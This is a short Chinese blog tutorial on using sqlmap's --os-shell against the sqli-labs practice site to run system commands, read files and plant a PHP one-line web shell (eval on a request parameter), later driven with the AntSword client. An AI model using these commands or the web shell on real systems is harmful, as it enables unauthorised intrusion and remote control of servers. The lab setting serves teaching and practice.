sqlmap使用之读写文件-执行命令

Love The Way You Lie 2022-09-03 10:21 394阅读 0赞

文章目录

    • sqlmap-读写文件-执行命令-基础实验
      • 实验内容
        • 步骤1. 访问目标机web页面
        • 步骤2. 发现注入点
        • 步骤3. 进入os-shell交互界面
        • 步骤4 选择网站语言
        • 步骤5 输入网站的绝对路径
        • 步骤6. 读取网站敏感文件如/etc/passwd
        • 步骤7.在当前目录下写入任意文件,这里我写入shell.php一句话木马
        • 步骤8.使用蚁剑执行
      • 总结
      • 免责声明

sqlmap-读写文件-执行命令-基础实验

实验内容

步骤1. 访问目标机web页面

在这里插入图片描述

步骤2. 发现注入点

  1. python sqlmap.py -u http://192.168.232.243/sqli-labs-master/Less-3/?id=2

在这里插入图片描述

步骤3. 进入os-shell交互界面

  1. python sqlmap.py -u http://192.168.232.243/sqli-labs-master/Less-3/?id=2  --os-shell

在这里插入图片描述

步骤4 选择网站语言

在这里插入图片描述

步骤5 输入网站的绝对路径

  1. C:/phpStudy/WWW/

在这里插入图片描述

步骤6. 读取网站敏感文件如/etc/passwd

  1. dir
  2. ifconfig
  3. net user

在这里插入图片描述
在这里插入图片描述

步骤7.在当前目录下写入任意文件,这里我写入shell.php一句话木马

  1. echo "<?php @eval($_REQUEST['123']);?>" >123.php

在这里插入图片描述

步骤8.使用蚁剑执行

在这里插入图片描述
在这里插入图片描述

总结

–os-shell的执行条件有三个

  • 1.网站的权限必须是root
  • 2.需要直到网站的绝对路径
  • 3.GPC为off,php主动转义功能关闭

小技巧:

在使用–os-shell进行交互之前可以使用–is-dba 来判断是否能够进行shell交互,节省时间。
在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

发表评论

表情:
评论列表 (有 0 条评论,394人围观)

还没有评论,来说两句吧...

相关阅读